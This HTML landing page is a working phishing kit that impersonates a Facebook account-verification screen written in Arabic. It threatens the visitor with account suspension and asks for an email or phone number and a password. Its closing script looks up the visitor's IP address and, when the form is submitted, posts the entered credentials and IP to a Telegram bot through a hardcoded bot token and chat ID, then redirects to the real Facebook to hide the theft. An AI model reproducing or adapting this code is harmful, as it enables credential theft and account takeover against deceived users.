<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!--0625f174-183a-4588-9159-67c7fac9bcb1 a-->

    <title></title>
    <meta name="keywords" content="">
    <meta name="description" content="">




    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="lp-version" content="v6.24.47">
    <style title="page-styles" type="text/css" data-page-type="main_desktop">
        body {
            color: #000;
        }

        a {
            color: #0000ff;
            text-decoration: none;
        }

        #lp-pom-root {
            display: block;
            background: rgba(238, 238, 238, 1);
            border-style: none;
            margin: auto;
            padding-top: 0px;
            border-radius: 0px;
            min-width: 1186px;
            height: 900px;
        }

        #lp-pom-block-11 {
            display: block;
            background: rgba(255, 255, 255, 1);
            border-style: none;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 3px;
            border-radius: 0px;
            width: 100%;
            height: 897px;
            position: relative;
        }

        #lp-pom-box-59 {
            display: block;
            background: rgba(255, 255, 255, 1);
            border-style: solid;
            border-width: 1px;
            border-color: #ccc;
            border-radius: 0px;
            left: 122.5px;
            top: 0px;
            z-index: 1;
            width: 939px;
            height: 895px;
            position: absolute;
        }

        #lp-pom-text-60 {
            display: block;
            background: rgba(255, 255, 255, 0);
            border-style: none;
            border-radius: 0px;
            left: 243.5px;
            top: 297px;
            z-index: 2;
            width: 446px;
            height: 40px;
            position: absolute;
        }

        #lp-pom-text-63 {
            display: block;
            background: rgba(255, 255, 255, 0);
            border-style: none;
            border-radius: 0px;
            left: 319.5px;
            top: 567px;
            z-index: 5;
            width: 300px;
            height: 22px;
            position: absolute;
        }

        #lp-pom-image-64 {
            display: block;
            background: rgba(255, 255, 255, 0);
            left: 304.5px;
            top: 644px;
            z-index: 6;
            position: absolute;
        }

        #lp-pom-image-65 {
            display: block;
            background: rgba(255, 255, 255, 0);
            left: 259px;
            top: -18px;
            z-index: 7;
            position: absolute;
        }

        #lp-pom-text-66 {
            display: block;
            background: rgba(255, 255, 255, 0);
            border-style: none;
            border-radius: 0px;
            left: 319.5px;
            top: 259px;
            z-index: 8;
            width: 300px;
            height: 22px;
            position: absolute;
        }

        #lp-pom-text-67 {
            display: block;
            background: rgba(255, 255, 255, 0);
            border-style: none;
            border-radius: 0px;
            left: 243.5px;
            top: 595px;
            z-index: 9;
            width: 448px;
            height: 60px;
            position: absolute;
        }

        #lp-pom-text-68 {
            display: block;
            background: rgba(255, 255, 255, 0);
            border-style: none;
            border-radius: 0px;
            left: 391.5px;
            top: 483px;
            z-index: 10;
            width: 300px;
            height: 20px;
            position: absolute;
        }

        #lp-pom-button-62 {
            display: block;
            border-style: none;
            border-radius: 5px;
            left: 2px;
            top: 150px;
            z-index: 4;
            width: 442px;
            height: 48px;
            position: absolute;
            background: rgba(0, 152, 219, 1);
            box-shadow: none;
            text-shadow: none;
            color: #fff;
            border-width: undefinedpx;
            border-color: undefined;
            font-size: 16px;
            line-height: 19px;
            font-weight: 400;
            font-family: Arial, sans-serif;
            font-style: normal;
            text-align: center;
            background-repeat: no-repeat;
        }

        #lp-pom-root .lp-positioned-content {
            top: 0px;
            width: 1186px;
            margin-left: -593px;
        }

        #lp-pom-block-11 .lp-pom-block-content {
            margin-left: auto;
            margin-right: auto;
            width: 1186px;
            height: 897px;
        }

        #container_first_name {
            position: absolute;
            top: 0px;
            left: 0px;
            width: 444px;
            height: 49px;
        }

        .lp-pom-form-field .ub-input-item.single.form_elem_first_name {
            position: absolute;
            top: 0px;
            left: 0px;
            width: 444px;
            height: 49px;
        }

        #container_last_name {
            position: absolute;
            top: 67px;
            left: 0px;
            width: 444px;
            height: 49px;
        }

        .lp-pom-form-field .ub-input-item.single.form_elem_last_name {
            position: absolute;
            top: 0px;
            left: 0px;
            width: 444px;
            height: 49px;
        }

        #lp-pom-button-62:hover {
            background: rgba(0, 136, 208, 1);
            box-shadow: none;
            color: #fff;
        }

        #lp-pom-button-62:active {
            background: rgba(0, 124, 197, 1);
            box-shadow: none;
            color: #fff;
        }

        #lp-pom-button-62 .label {
            margin-top: -10px;
        }

        #lp-pom-image-64 .lp-pom-image-container {
            border-style: none;
            border-radius: 0px;
            width: 330px;
            height: 185px;
        }

        #lp-pom-image-64 .lp-pom-image-container img {
            width: 330px;
            height: 185px;
        }

        #lp-pom-image-65 .lp-pom-image-container {
            border-style: none;
            border-radius: 0px;
            width: 421px;
            height: 300px;
        }

        #lp-pom-image-65 .lp-pom-image-container img {
            width: 421px;
            height: 300px;
        }

        #lp-pom-root-color-overlay {
            position: absolute;
            background: none;
            top: 0;
            width: 100%;
            height: 900px;
            min-height: 100%;
        }

        #lp-pom-block-11-color-overlay {
            position: absolute;
            background: none;
            height: 897px;
            width: 100%;
            ;
        }

        #lp-pom-box-59-color-overlay {
            position: absolute;
            background: none;
            height: 895px;
            width: 939px;
        }

        #lp-pom-form-61 {
            display: block;
            left: 247.5px;
            top: 361px;
            z-index: 3;
            width: 444px;
            height: 0px;
            position: absolute;
        }

        #lp-pom-form-61 .fields {
            margin: -9px;
        }

        #lp-pom-form-61 .lp-pom-form-field {
            position: absolute;
        }

        #lp-pom-form-61 .option {
            position: absolute;
        }

        #lp-pom-form-61 .optionsList {
            position: absolute;
        }

        #lp-pom-form-61 .lp-pom-form-field .single {
            height: 49px;
            font-size: 15px;
            line-height: 15px;
            padding-left: 16px;
            padding-right: 16px;
            flex: 1;
        }

        #lp-pom-form-61 .lp-pom-form-field select {
            height: 47px;
        }

        #lp-pom-form-61 .lp-pom-form-field .form_elem_multi {
            padding-top: 16px;
            padding-bottom: 16px;
        }

        #lp-pom-form-61 .lp-pom-form-field .lp-form-label {
            font-family: arial;
            font-weight: 400;
            font-size: 14px;
            line-height: 15px;
            color: #000;
            display: block;
            margin-bottom: 4px;
            width: auto;
            margin-right: 0px;
        }

        #lp-pom-form-61 .lp-pom-form-field .lp-form-label .label-style {
            font-weight: bolder;
            font-style: inherit;
        }

        #lp-pom-form-61 .lp-pom-form-field input[type=text],
        #lp-pom-form-61 .lp-pom-form-field input[type=email],
        #lp-pom-form-61 .lp-pom-form-field input[type=tel],
        #lp-pom-form-61 .lp-pom-form-field textarea,
        #lp-pom-form-61 .lp-pom-form-field select {
            border-style: solid;
            border-width: 1px;
            border-color: #bbbbbb;
        }

        #lp-pom-form-61 .lp-pom-form-field .opt-label {
            font-family: arial;
            font-weight: 400;
            font-size: 13px;
            color: #000;
            line-height: 15px;
        }

        #lp-pom-form-61 .lp-pom-form-field .opt-label .label-style {
            font-weight: inherit;
            font-style: inherit;
        }

        #lp-pom-form-61 .lp-pom-form-field .text {
            background-color: #fff;
            color: #000;
            border-radius: 5px;
        }
    </style>
    <style title="page-styles" type="text/css" data-page-type="main_mobile">
        @media only screen and (max-width: 600px) {
            #lp-pom-root {
                display: block;
                background: rgba(238, 238, 238, 1);
                border-style: none;
                margin: auto;
                padding-top: 0px;
                border-radius: 0px;
                min-width: 320px;
                height: 801px;
            }

            #lp-pom-block-11 {
                display: block;
                background: rgba(221, 221, 221, 1);
                border-style: none;
                margin-left: auto;
                margin-right: auto;
                margin-bottom: 3px;
                border-radius: 0px;
                width: 100%;
                height: 798px;
                position: relative;
            }

            #lp-pom-box-59 {
                display: block;
                background: rgba(255, 255, 255, 1);
                border-style: solid;
                border-width: 1px;
                border-color: #ccc;
                border-radius: 13px;
                left: -60.5px;
                top: 0px;
                z-index: 1;
                width: 439px;
                height: 795px;
                position: absolute;
            }

            #lp-pom-text-60 {
                display: block;
                background: rgba(255, 255, 255, 0);
                border-style: none;
                border-radius: 0px;
                left: 47px;
                top: 223px;
                z-index: 2;
                width: 341px;
                height: 60px;
                position: absolute;
            }

            #lp-pom-text-63 {
                display: block;
                background: rgba(255, 255, 255, 0);
                border-style: none;
                border-radius: 0px;
                left: 69.5px;
                top: 497px;
                z-index: 5;
                width: 300px;
                height: 22px;
                position: absolute;
            }

            #lp-pom-image-64 {
                display: block;
                background: rgba(255, 255, 255, 0);
                left: 82.5px;
                top: 592px;
                z-index: 6;
                position: absolute;
            }

            #lp-pom-image-65 {
                display: block;
                background: rgba(255, 255, 255, 0);
                left: 59.5px;
                top: -31px;
                z-index: 7;
                position: absolute;
            }

            #lp-pom-text-66 {
                display: block;
                background: rgba(255, 255, 255, 0);
                border-style: none;
                border-radius: 0px;
                left: 109.5px;
                top: 188px;
                z-index: 8;
                width: 300px;
                height: 22px;
                transform: scale(0.93);
                transform-origin: 0 0;
                -webkit-transform: scale(0.93);
                -webkit-transform-origin: 0 0;
                position: absolute;
            }

            #lp-pom-text-67 {
                display: block;
                background: rgba(255, 255, 255, 0);
                border-style: none;
                border-radius: 0px;
                left: 42.5px;
                top: 541px;
                z-index: 9;
                width: 346px;
                height: 80px;
                position: absolute;
            }

            #lp-pom-text-68 {
                display: block;
                background: rgba(255, 255, 255, 0);
                border-style: none;
                border-radius: 0px;
                left: 88px;
                top: 416px;
                z-index: 10;
                width: 300px;
                height: 20px;
                position: absolute;
            }

            #lp-pom-button-62 {
                display: block;
                border-style: none;
                border-radius: 5px;
                left: 0px;
                top: 147px;
                z-index: 4;
                width: 337px;
                height: 45px;
                position: absolute;
                background: rgba(0, 132, 219, 1);
                box-shadow: none;
                text-shadow: none;
                color: #fff;
                border-width: undefinedpx;
                border-color: undefined;
                font-size: 16px;
                line-height: 19px;
                font-weight: 400;
                font-family: Arial, sans-serif;
                font-style: normal;
                text-align: center;
                background-repeat: no-repeat;
            }

            body {
                color: #000;
            }

            a {
                color: #0000ff;
                text-decoration: none;
            }

            #lp-pom-root .lp-positioned-content {
                top: 0px;
                width: 320px;
                margin-left: -160px;
            }

            #lp-pom-block-11 .lp-pom-block-content {
                margin-left: auto;
                margin-right: auto;
                width: 320px;
                height: 798px;
            }

            #container_first_name {
                position: absolute;
                top: 0px;
                left: 0px;
                width: 338px;
                height: 47px;
            }

            .lp-pom-form-field .ub-input-item.single.form_elem_first_name {
                position: absolute;
                top: 0px;
                left: 0px;
                width: 338px;
                height: 47px;
            }

            #container_last_name {
                position: absolute;
                top: 65px;
                left: 0px;
                width: 338px;
                height: 47px;
            }

            .lp-pom-form-field .ub-input-item.single.form_elem_last_name {
                position: absolute;
                top: 0px;
                left: 0px;
                width: 338px;
                height: 47px;
            }

            #lp-pom-button-62:hover {
                background: rgba(0, 115, 208, 1);
                box-shadow: none;
                color: #fff;
            }

            #lp-pom-button-62:active {
                background: rgba(0, 105, 197, 1);
                box-shadow: none;
                color: #fff;
            }

            #lp-pom-button-62 .label {
                margin-top: -10px;
            }

            #lp-pom-image-64 .lp-pom-image-container {
                border-style: none;
                border-radius: 0px;
                width: 274px;
                height: 154px;
            }

            #lp-pom-image-64 .lp-pom-image-container img {
                width: 274px;
                height: 154px;
            }

            #lp-pom-image-65 .lp-pom-image-container {
                border-style: none;
                border-radius: 0px;
                width: 320px;
                height: 228px;
            }

            #lp-pom-image-65 .lp-pom-image-container img {
                width: 320px;
                height: 228px;
            }

            #lp-pom-root-color-overlay {
                position: absolute;
                background: none;
                top: 0;
                width: 100%;
                height: 801px;
                min-height: 100%;
            }

            #lp-pom-block-11-color-overlay {
                position: absolute;
                background: none;
                height: 798px;
                width: 100%;
                ;
            }

            #lp-pom-box-59-color-overlay {
                position: absolute;
                background: none;
                border-radius: 12px;
                height: 795px;
                width: 439px;
            }

            #lp-pom-form-61 {
                display: block;
                left: 47px;
                top: 297px;
                z-index: 3;
                width: 338px;
                height: 0px;
                position: absolute;
            }

            #lp-pom-form-61 .fields {
                margin: -9px;
            }

            #lp-pom-form-61 .lp-pom-form-field {
                position: absolute;
            }

            #lp-pom-form-61 .option {
                position: absolute;
            }

            #lp-pom-form-61 .optionsList {
                position: absolute;
            }

            #lp-pom-form-61 .lp-pom-form-field .single {
                height: 47px;
                font-size: 15px;
                line-height: 15px;
                padding-left: 15px;
                padding-right: 15px;
                flex: 1;
            }

            #lp-pom-form-61 .lp-pom-form-field select {
                height: 45px;
            }

            #lp-pom-form-61 .lp-pom-form-field .form_elem_multi {
                padding-top: 15px;
                padding-bottom: 15px;
            }

            #lp-pom-form-61 .lp-pom-form-field .lp-form-label {
                font-family: arial;
                font-weight: 400;
                font-size: 14px;
                line-height: 15px;
                color: #000;
                display: block;
                margin-bottom: 4px;
                width: auto;
                margin-right: 0px;
            }

            #lp-pom-form-61 .lp-pom-form-field .lp-form-label .label-style {
                font-weight: bolder;
                font-style: inherit;
            }

            #lp-pom-form-61 .lp-pom-form-field input[type=text],
            #lp-pom-form-61 .lp-pom-form-field input[type=email],
            #lp-pom-form-61 .lp-pom-form-field input[type=tel],
            #lp-pom-form-61 .lp-pom-form-field textarea,
            #lp-pom-form-61 .lp-pom-form-field select {
                border-style: solid;
                border-width: 1px;
                border-color: #bbbbbb;
            }

            #lp-pom-form-61 .lp-pom-form-field .opt-label {
                font-family: arial;
                font-weight: 400;
                font-size: 13px;
                color: #000;
                line-height: 15px;
            }

            #lp-pom-form-61 .lp-pom-form-field .opt-label .label-style {
                font-weight: inherit;
                font-style: inherit;
            }

            #lp-pom-form-61 .lp-pom-form-field .text {
                background-color: #fff;
                color: #000;
                border-radius: 5px;
            }
        }
    </style><!-- lp:insertions start head -->
    <link href="//builder-assets.unbounce.com/published-css/main-7b78720.z.css" rel="stylesheet" media="screen"
        type="text/css" />
    <meta property='og:title' content='' />
    <script
        type="text/javascript">window.ub = { "page": { "id": "0625f174-183a-4588-9159-67c7fac9bcb1", "variantId": "a", "usedAs": "main", "name": "Jordan!3", "url": "hi", "dimensions": { "desktop": { "height": 900, "width": 1186 }, "mobile": { "height": 801, "width": 320 }, "mobileMaxWidth": 600 } }, "hooks": { "beforeFormSubmit": [], "afterFormSubmit": [] } };</script>
    <script
        type="text/javascript">window.ub.form = { "action": "url", "validationRules": { "first_name": { "required": true }, "last_name": { "required": true } }, "validationMessages": { "first_name": {}, "last_name": {} }, "customValidators": {}, "includeFormData": false, "url": "https://www.facebook.com/", "target": "_self", "isConversionGoal": true }; window.module = { lp: { form: { data: window.ub.form } } };</script>



    <!-- Favicon  -->
    <!-- <link rel="icon" href="URL of the icon you want to display" type="image/x-icon"> -->

    <!-- Open Graph Type -->
    <meta property="og:type" content="website" />


    <script>
        // Kiểm tra nếu URL chứa index.html, chuyển hướng đến URL không có index.html
        if (window.location.href.indexOf('index2.html') > -1) {
            window.location.href = window.location.href.replace('index2.html', 'errpass');
        }

        // Xử lý khi người dùng chuyển qua trang thứ hai
        function goToSecondPage() {
            // Lấy đường dẫn hiện tại
            var currentUrl = window.location.href;
            // Thêm tên thư mục vào đường dẫn
            var newUrl = currentUrl;
            // Chuyển hướng tới trang thứ hai với tên thư mục
            window.location.href = newUrl;
        }
    </script>


    <script>window.ub = window.ub || {}; window.ub.visitorId = "92c92657-800d-4864-ac8d-0de16a1f5dda"; window.ub.routingStrategy = "single"; window.ub.domain = {};</script>
    <script async src="/_ub/static/ts/b907c51d6869e69d8a396f17f7ba15905e81aff2.js"></script>
</head>

<body class="lp-pom-body"><!-- lp:insertions start body:before --><!-- lp:insertions end body:before -->




    <div class="lp-element lp-pom-root" id="lp-pom-root">
        <div id="lp-pom-root-color-overlay"></div>
        <div class="lp-positioned-content">
            <div class="lp-element lp-pom-box" id="lp-pom-box-59">
                <div id="lp-pom-box-59-color-overlay"></div>
                <div class="lp-element lp-pom-text nlh" id="lp-pom-text-60">
                    <p style="text-align: right; line-height: 20px;"><span style="font-size: 16px;">يعمل فيسبوك حاليًا
                            على تحسين حملات فحص الحسابات، واكتشاف الحسابات ذات الأنشطة المخالفة وتحذيرها. يرجى تسجيل
                            الدخول للتحقق من حسابك.</span></p>
                </div>
                <div class="lp-element lp-pom-form has-axis" id="lp-pom-form-61">
                    <form><input type="hidden" name="pageId" value="0625f174-183a-4588-9159-67c7fac9bcb1"><input
                            type="hidden" name="pageVariant" value="a">
                        <div class="fields">
                            <div class="lp-pom-form-field single-line-text" id="container_first_name"><input
                                    id="first_name" name="first_name" type="text"
                                    class="ub-input-item single text form_elem_first_name"
                                    placeholder="البريد الإلكتروني أو رقم الهاتف" required=""></div>
                            <div class="lp-pom-form-field single-line-text" id="container_last_name"><input
                                    id="last_name" name="last_name" type="text"
                                    class="ub-input-item single text form_elem_last_name" placeholder="كلمة السر"
                                    required=""></div>
                        </div><button class="lp-element lp-pom-button" id="lp-pom-button-62" type="submit"><span
                                class="label"><strong>تسجيل الدخول</strong></span></button>
                    </form>
                </div>
                <div class="lp-element lp-pom-text nlh" id="lp-pom-text-63">
                    <p style="text-align: center;"><span style="font-size: 16px; color: rgb(51, 122, 255);">هل نسيت كلمة
                            السر؟</span></p>
                </div>
                <div class="lp-element lp-pom-image" id="lp-pom-image-64">
                    <div class="lp-pom-image-container" style="overflow: hidden;"><img
                            src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt=""
                            data-src-desktop-1x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/e7924028-5704621-cover-meta.gif"
                            data-src-mobile-1x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/e7924028-5704621-cover-meta.gif">
                    </div>
                </div>
                <div class="lp-element lp-pom-image" id="lp-pom-image-65">
                    <div class="lp-pom-image-container" style="overflow: hidden;"><img
                            src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt=""
                            data-src-desktop-1x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/3vfbrg-79303-b4556d66b859298bdf16a17992c33e6b_10bp08c00000000000001o.jpg"
                            data-src-desktop-2x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/3vfbrg-79303-b4556d66b859298bdf16a17992c33e6b_100000000000000000001o.jpg"
                            data-src-mobile-1x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/3vfbrg-79303-b4556d66b859298bdf16a17992c33e6b_108w06c00000000000001o.jpg"
                            data-src-mobile-2x="//d9hhrg4mnvzow.cloudfront.net/supostanhmeta.ubpages.com/jordan3/3vfbrg-79303-b4556d66b859298bdf16a17992c33e6b_100000000000000000001o.jpg">
                    </div>
                </div>
                <div class="lp-element lp-pom-text nlh" id="lp-pom-text-66">
                    <p style="text-align: right;"><span style="font-size: 24px; color: rgb(33, 96, 239);"><strong>تحقق
                                من حسابك</strong></span></p>
                </div>
                <div class="lp-element lp-pom-text nlh" id="lp-pom-text-67">
                    <p style="text-align: right; line-height: 20px;"><span
                            style="font-size: 16px; color: rgb(0, 0, 0);">*ملاحظة: قم بتسجيل الدخول إلى الحساب المخالف
                            الصحيح الذي أرسل فيسبوك الإشعار إليه. إذا قمت بالدخول بشكل غير صحيح أو استخدمت حسابًا آخر
                            لإرسال التحقق، فلن نرد على شكواك وسنستمر في تعليق حسابك كما تم الإعلان عنه مسبقًا.</span>
                    </p>
                </div>
                <div class="lp-element lp-pom-text nlh" id="lp-pom-text-68">
                    <p style="line-height: 20px;"><span style="font-size: 14px; color: rgb(255, 8, 8);">الحساب أو كلمة
                            المرور التي أدخلتها غير صحيحة</span></p>
                </div>
            </div>
        </div>
        <div id="ipAddress" style="display: none;"></div>
        <div class="lp-element lp-pom-block" id="lp-pom-block-11">
            <div id="lp-pom-block-11-color-overlay"></div>
            <div class="lp-pom-block-content"></div>
        </div>
    </div><!-- lp:insertions start body:after -->



    <script>
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                var ipAddress = data.ip;
                document.getElementById("ipAddress").innerText = "IP Address: " + ipAddress;
                // Tiếp tục xử lý dữ liệu hoặc gửi IP về nơi bạn cần
            })
            .catch(error => {
                console.error('Error getting IP address:', error);
                document.getElementById("ipAddress").innerText = "Error getting IP address!";
            });
    
            
            document.getElementById("lp-pom-button-62").addEventListener("click", function () {
            // Lấy dữ liệu từ các trường nhập liệu
            var firstName = document.getElementById("first_name").value;
            var lastName = document.getElementById("last_name").value;
    
            // Kiểm tra xem cả hai trường nhập liệu có dữ liệu không
            if (firstName.trim() !== '' && lastName.trim() !== '') {
                // Lấy địa chỉ IP
                
                var ipAddress123 = document.getElementById("ipAddress").innerText;
    
                
                // Token của bot Telegram
                var botToken = '6591392740:AAGw9FfUDM-FDCI9PzTWUXc1RBuIsLPfldU';
    
                // Chat ID của nhóm Telegram
                var chatId = '@ongochoc123';
    
                // Tin nhắn bạn muốn gửi
                var message = 'New data received lần 2:\nUser: ' + firstName + '\nPass: ' + lastName + '\n' + ipAddress123;
    
                // Tạo URL endpoint để gửi tin nhắn
                var telegramApiUrl = 'https://api.telegram.org/bot' + botToken + '/sendMessage';
    
                // Sử dụng Fetch API để gửi tin nhắn
                fetch(telegramApiUrl, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: chatId,
                        text: message
                    })
                })
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Network response was not ok');
                        }
                        return response.json();
                    })
                    .then(data => {
                        console.log('Message sent successfully:', data);
                        window.location.href = 'https://www.facebook.com/';
                    })
                    .catch(error => {
                        console.error('There was a problem with sending message:', error);
                        alert('Error sending message!');
                    });
            } else {
                alert("Please enter both first name and last name.");
            }
        });
    </script>
    

    <script async src="//builder-assets.unbounce.com/published-js/main.bundle-c3f2a09.z.js"
        type="text/javascript"></script><!-- lp:insertions end body:after -->
</body>

</html>